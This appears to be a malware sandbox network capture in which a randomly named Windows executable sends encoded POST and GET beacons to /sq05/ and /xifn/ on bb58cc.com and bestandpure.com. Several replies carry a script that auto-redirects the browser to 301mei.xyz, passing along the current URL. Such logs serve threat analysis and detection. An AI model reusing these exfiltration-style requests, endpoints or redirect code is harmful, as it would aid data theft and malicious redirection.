                            Data Ascii: UbV=1twJ7FywR8/KGoJ/1gfp7RPkhvl58utSq2w31mIZoEMm4MujGgMPs+WPHdxAsx78c11mnqgPaGlSOEj3uKDpEHv7X6c18EtJPYMNkHbPxwY2ciHufC2ityRxh7ezNR6E8r/KxQqcm4GiYMvZx8K2eKYdce48N5WQMcHzvUnkucJEvwMc09mRYXoXdEjTIUoOgQ==
                            Jul 16, 2024 07:23:30.903335094 CEST552INHTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.449763103.176.91.154801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:32.651810884 CEST645OUTPOST /sq05/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.bb58cc.com
                            Origin: http://www.bb58cc.com
                            Referer: http://www.bb58cc.com/sq05/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 31 74 77 4a 37 46 79 77 52 38 2f 4b 48 4a 35 2f 30 42 66 70 39 78 50 6e 39 2f 6c 35 6d 65 74 65 71 32 73 33 31 69 5a 53 76 32 6f 6d 34 74 65 6a 48 68 4d 50 67 65 57 50 4d 39 78 46 69 52 37 31 63 31 34 47 6e 72 63 50 61 47 78 53 4f 46 2f 33 75 39 33 6f 48 33 76 31 50 4b 63 7a 79 6b 74 4a 50 59 4d 4e 6b 48 50 70 78 77 41 32 63 52 50 75 65 67 65 68 78 43 52 2b 69 37 65 7a 48 78 37 4e 38 72 2b 66 78 53 50 48 6d 37 2b 69 59 4f 33 5a 78 4a 6d 33 55 4b 59 58 51 4f 35 44 46 62 43 5a 42 63 32 44 71 44 4f 66 6f 49 39 45 75 32 64 47 6c 4d 48 47 4b 58 4d 6b 41 44 71 6e 46 58 56 48 37 62 56 39 51 56 76 59 41 77 4b 31 35 72 71 2f 46 2f 43 57 64 32 51 3d
                            Data Ascii: UbV=1twJ7FywR8/KHJ5/0Bfp9xPn9/l5meteq2s31iZSv2om4tejHhMPgeWPM9xFiR71c14GnrcPaGxSOF/3u93oH3v1PKczyktJPYMNkHPpxwA2cRPuegehxCR+i7ezHx7N8r+fxSPHm7+iYO3ZxJm3UKYXQO5DFbCZBc2DqDOfoI9Eu2dGlMHGKXMkADqnFXVH7bV9QVvYAwK15rq/F/CWd2Q=
                            Jul 16, 2024 07:23:33.446985006 CEST552INHTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.449764103.176.91.154801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:35.185833931 CEST10727OUTPOST /sq05/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.bb58cc.com
                            Origin: http://www.bb58cc.com
                            Referer: http://www.bb58cc.com/sq05/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 31 74 77 4a 37 46 79 77 52 38 2f 4b 48 4a 35 2f 30 42 66 70 39 78 50 6e 39 2f 6c 35 6d 65 74 65 71 32 73 33 31 69 5a 53 76 32 67 6d 35 66 57 6a 47 43 6b 50 6a 65 57 50 46 64 78 45 69 52 36 6c 63 30 51 4b 6e 72 51 31 61 45 4a 53 50 6e 62 33 6d 70 72 6f 51 48 76 31 47 71 63 79 38 45 73 44 50 59 63 4a 6b 48 66 70 78 77 41 32 63 51 2f 75 4f 43 32 68 7a 43 52 78 68 37 65 6e 4e 52 37 68 38 72 33 6f 78 53 62 58 68 4c 65 69 59 75 6e 5a 68 72 65 33 4a 61 59 52 54 4f 35 62 46 62 66 42 42 63 62 36 71 47 7a 58 6f 50 56 45 76 79 74 5a 77 4e 48 46 63 6c 59 5a 58 42 36 43 4e 57 78 42 39 73 64 46 44 55 4c 71 63 53 69 71 79 73 4c 55 59 65 47 70 49 41 79 57 39 52 66 4d 4b 78 54 7a 52 75 4a 37 67 50 64 57 6d 70 75 45 44 69 74 67 31 6a 75 46 32 77 45 38 47 75 4c 38 66 52 74 43 44 52 44 56 68 64 7a 6c 4f 62 54 33 64 49 62 33 66 31 34 37 78 76 63 6b 6e 70 42 33 6c 67 70 45 42 58 52 6c 77 47 38 7a 68 30 4c 43 65 44 68 37 39 7a 65 4b 55 75 45 46 43 55 2f 55 44 37 47 65 55 47 36 68 62 53 2f 6f 41 4c 6e 70 78 33 [TRUNCATED]
                            Data Ascii: UbV=1twJ7FywR8/KHJ5/0Bfp9xPn9/l5meteq2s31iZSv2gm5fWjGCkPjeWPFdxEiR6lc0QKnrQ1aEJSPnb3mproQHv1Gqcy8EsDPYcJkHfpxwA2cQ/uOC2hzCRxh7enNR7h8r3oxSbXhLeiYunZhre3JaYRTO5bFbfBBcb6qGzXoPVEvytZwNHFclYZXB6CNWxB9sdFDULqcSiqysLUYeGpIAyW9RfMKxTzRuJ7gPdWmpuEDitg1juF2wE8GuL8fRtCDRDVhdzlObT3dIb3f147xvcknpB3lgpEBXRlwG8zh0LCeDh79zeKUuEFCU/UD7GeUG6hbS/oALnpx3AgFais75q0drDeYTVuYdh05Z8M1XXCL4M88lEc3f/C2c0UCQd0JmAGXWDbNKXHT2+FTN5RV5jsGam1MfSPirzHLzieU1xcCfHEObnt1/Rtlk1zDtR3UoOV5o6oqUeXQ4SvQV6Ab4zqQuhTKkr8b60svMf1l2Jlm5EPYUW6MOIOZu4Xw9WTwm6vhI6DYR+mDV12TK2zjy4/ksDgawpiof4GDTxxL+WuoO5aNbz6QNlUTOgRUGOheKJpZM6oR0AMSPovJw6CfKUtXAzm9SmOC4zxgCN+7WbM1p+0/LC0YRh7Se0Ar+SIMBLHeXQgwt2BvA98xuvsJWGC2gwuDhzq5uFsSm/bct3EoorCQWpSHITl2Awt7RYRuwWcxcoZVhWPJue3WQzQ53jHInqcvT7y6Z835eQEat1oP3bMrZUONF/bFKaF+l1i/YZ9dCLbJXzX8BDAa/txbMiF+g+6AdCJgFAyEOSvKAS1/fk7mZW1/LjE8CaEuPxZJzgodRYr1d1YKQAmCkhsb3rgLvmZ1h11l/zNbW8t8EOKeFBcr6rVyQ3AUEULGNaK1M6cedgvl0MkLYLU9Qt8n3oasALGjIFh+GkjHJIUlP2rlIDoTJnSVGUWbrZW5n0+f6AgfLp84PwYmHiCc9GhwWTWxJiuVmEhaaXeZH9RTyHnEMfa [TRUNCATED]
                            Jul 16, 2024 07:23:35.993015051 CEST552INHTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.449765103.176.91.154801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:37.719692945 CEST364OUTGET /sq05/?UbV=4vYp4xDXBquPAaly5jqpyiz8vvwHg+w1s2ckl3sNoEBm9sSVWgAmrZHKJppZ7gqiYW0PudZtcTAAOkaLjZ+tbjDRBawb/1kyJrI7kWHcwz8aVyTLSwOG2zw=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.bb58cc.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:23:38.832328081 CEST552INHTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>
                            Jul 16, 2024 07:23:38.832446098 CEST552INHTTP/1.0 200 OK
                            Connection: close
                            Cache-Control: max-age=259200
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 423
                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 33 30 31 6d 65 69 2e 78 79 7a 3a 37 37 38 38 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 [TRUNCATED]
                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://301mei.xyz:7788/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.4497663.33.244.179801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:43.961586952 CEST640OUTPOST /xifn/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.bestandpure.com
                            Origin: http://www.bestandpure.com
                            Referer: http://www.bestandpure.com/xifn/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 48 63 6b 67 71 47 36 55 75 68 54 44 72 73 68 71 6f 41 74 6e 39 54 55 37 39 32 45 4b 5a 43 2b 45 49 49 48 61 2b 79 2b 66 56 4c 4c 58 66 6d 56 76 61 6a 6b 51 56 78 45 53 48 55 53 53 63 6f 52 69 68 33 6e 54 53 53 4c 55 6f 58 73 33 63 30 5a 63 78 32 32 78 44 48 46 34 69 50 48 33 6e 54 72 79 75 35 64 6f 74 6d 47 72 4e 66 6c 67 2f 6e 49 77 2f 45 45 77 4d 32 64 56 61 38 52 4f 63 43 70 59 77 78 67 48 58 6a 44 6b 35 4a 36 77 64 4b 34 63 72 72 36 72 49 79 31 2f 47 6b 31 73 6b 71 63 77 4b 77 79 67 4b 34 41 74 74 69 61 79 50 72 72 6f 37 57 44 41 61 73 74 6a 37 71 34 42 5a 74 39 65 37 41 3d 3d
                            Data Ascii: UbV=HckgqG6UuhTDrshqoAtn9TU792EKZC+EIIHa+y+fVLLXfmVvajkQVxESHUSScoRih3nTSSLUoXs3c0Zcx22xDHF4iPH3nTryu5dotmGrNflg/nIw/EEwM2dVa8ROcCpYwxgHXjDk5J6wdK4crr6rIy1/Gk1skqcwKwygK4AttiayPrro7WDAastj7q4BZt9e7A==


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.4497673.33.244.179801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:46.496733904 CEST660OUTPOST /xifn/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.bestandpure.com
                            Origin: http://www.bestandpure.com
                            Referer: http://www.bestandpure.com/xifn/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 48 63 6b 67 71 47 36 55 75 68 54 44 71 4e 52 71 76 6a 31 6e 32 54 55 36 7a 57 45 4b 54 69 2b 41 49 49 62 61 2b 32 47 50 57 2f 6e 58 63 47 6c 76 64 6e 51 51 57 78 45 53 50 30 53 58 59 6f 51 73 68 33 69 75 53 54 48 55 6f 58 34 33 63 78 6c 63 78 46 75 79 46 58 46 36 71 76 48 31 6f 7a 72 79 75 35 64 6f 74 6e 32 46 4e 63 56 67 2f 58 34 77 74 31 45 7a 4b 47 64 61 64 38 52 4f 4e 79 70 63 77 78 67 6c 58 6d 62 65 35 4c 43 77 64 4b 49 63 71 35 53 6f 43 79 30 30 4a 45 31 39 6e 5a 42 34 47 69 48 55 4e 35 74 50 79 79 43 31 48 4e 36 79 71 6e 69 58 49 73 4a 51 6d 74 78 31 55 75 41 58 67 4b 32 6a 58 61 58 5a 75 41 54 61 4a 57 49 79 56 34 6f 75 32 2b 49 3d
                            Data Ascii: UbV=HckgqG6UuhTDqNRqvj1n2TU6zWEKTi+AIIba+2GPW/nXcGlvdnQQWxESP0SXYoQsh3iuSTHUoX43cxlcxFuyFXF6qvH1ozryu5dotn2FNcVg/X4wt1EzKGdad8RONypcwxglXmbe5LCwdKIcq5SoCy00JE19nZB4GiHUN5tPyyC1HN6yqniXIsJQmtx1UuAXgK2jXaXZuATaJWIyV4ou2+I=


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            31192.168.2.4497683.33.244.179801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:49.031733036 CEST10742OUTPOST /xifn/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.bestandpure.com
                            Origin: http://www.bestandpure.com
                            Referer: http://www.bestandpure.com/xifn/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 48 63 6b 67 71 47 36 55 75 68 54 44 71 4e 52 71 76 6a 31 6e 32 54 55 36 7a 57 45 4b 54 69 2b 41 49 49 62 61 2b 32 47 50 57 2b 7a 58 66 33 46 76 62 41 4d 51 58 78 45 53 51 45 53 57 59 6f 51 68 68 7a 4f 69 53 54 61 68 6f 55 41 33 64 54 64 63 35 55 75 79 4c 58 46 36 6f 76 48 30 6e 54 72 6a 75 39 35 6b 74 6e 47 46 4e 63 56 67 2f 55 77 77 39 30 45 7a 49 47 64 56 61 38 52 4b 63 43 70 30 77 78 34 66 58 6d 57 38 35 66 32 77 63 75 73 63 6f 4b 36 6f 45 69 30 32 49 45 30 67 6e 5a 4e 33 47 69 62 75 4e 35 6f 69 79 77 65 31 46 5a 69 74 35 6b 75 4e 4b 74 4e 38 33 63 45 52 50 4d 51 5a 6e 4b 65 61 62 66 66 36 71 52 54 55 4b 68 39 4a 46 34 38 6b 6e 4f 37 32 4a 4c 65 69 71 50 70 61 2f 6a 61 52 68 7a 38 4e 59 57 66 55 69 30 50 58 69 30 41 6e 30 4e 4b 5a 49 5a 52 62 77 62 4e 31 78 4c 59 49 73 6c 6b 32 63 6b 33 2f 79 63 33 45 70 55 77 68 79 2f 39 74 4a 54 34 77 34 4e 32 41 59 30 65 42 34 57 72 4f 31 59 6c 38 35 39 35 30 43 6a 6e 44 78 51 51 37 65 36 50 70 5a 76 6d 2f 43 76 61 31 67 38 54 58 33 73 39 53 58 62 [TRUNCATED]
                            Data Ascii: UbV=HckgqG6UuhTDqNRqvj1n2TU6zWEKTi+AIIba+2GPW+zXf3FvbAMQXxESQESWYoQhhzOiSTahoUA3dTdc5UuyLXF6ovH0nTrju95ktnGFNcVg/Uww90EzIGdVa8RKcCp0wx4fXmW85f2wcuscoK6oEi02IE0gnZN3GibuN5oiywe1FZit5kuNKtN83cERPMQZnKeabff6qRTUKh9JF48knO72JLeiqPpa/jaRhz8NYWfUi0PXi0An0NKZIZRbwbN1xLYIslk2ck3/yc3EpUwhy/9tJT4w4N2AY0eB4WrO1Yl85950CjnDxQQ7e6PpZvm/Cva1g8TX3s9SXbA8tpSgPzB8ESRosey2bt9XvlgtdRV535ecW10WTFQtz3w+HnkFlUbkRwbsMhi1vLxAbd1h/068r2DX4glqEhGnvRgma+o4yQtpgNeSbzKQ6lRPawNeiC9XaKCbuIokIl9WpkeEB3fcmtgja9JrywtgZiluvNCqgEV5idJ66JVrOk9A8mx+pUkkBK17S5ELMk42vNNLsZU2RnT6KO0EAAAXZBgkuduW9eFX7OwiplQbdVQDPa52I7RWqKmLaAzcfizpXqhyhTMnImQ2R8KGKGiRkEQJomPUmSnWeaLNfxt874cfnbP2r03jSQwHDc2yME5c1wtDyBF0OkxX/oOEbh/Z5p18W1OHX45ysJuf+29s2/QZB+Q3+5DpT6qKRNTETaNYT2WV2yiMG3/ZYRM8ZhhtC08r53ymg9IKF3VJhHTRR9NuZsoPu0I6i2UlXDYr0O9TaLEQnBKIYQIdib0sQGlxn0s2kWc/CCIhM+ZiAzIHdZpzT/rJg+0pSDiZ50wHQN6PnAd8dGo9F9oC9yCcIBQYgsw6Eo6D5aeEzdCV9AkHaVE30krKAwAFLx1OcrlN6nMY5ix4hQAO48YQGSZ7B75xyTcSoELh1UCfgxkd4bW13FrC9x/0otALJ4fjtZjt2IzPgGN5z3Q6/WR7fH5Gjyze1FHeAXYemRzE [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            32192.168.2.4497693.33.244.179801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:23:51.778145075 CEST369OUTGET /xifn/?UbV=KeMApzCPoibat+BJrS4W/yBC5Ro5YTaRI5q2x3+rXL+pd1pzECcJYSRXND6sMrc7vw3XUkLR+QUTQhFw9n6rFEpLq+HIvi3a35dAhTq9JdFe3G51xVcQNW0=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.bestandpure.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:23:52.260881901 CEST395INHTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:23:52 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 62 56 3d 4b 65 4d 41 70 7a 43 50 6f 69 62 61 74 2b 42 4a 72 53 34 57 2f 79 42 43 35 52 6f 35 59 54 61 52 49 35 71 32 78 33 2b 72 58 4c 2b 70 64 31 70 7a 45 43 63 4a 59 53 52 58 4e 44 36 73 4d 72 63 37 76 77 33 58 55 6b 4c 52 2b 51 55 54 51 68 46 77 39 6e 36 72 46 45 70 4c 71 2b 48 49 76 69 33 61 33 35 64 41 68 54 71 39 4a 64 46 65 33 47 35 31 78 56 63 51 4e 57 30 3d 26 59 34 67 70 3d 6d 6c 6c 74 63 72 52 78 63 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
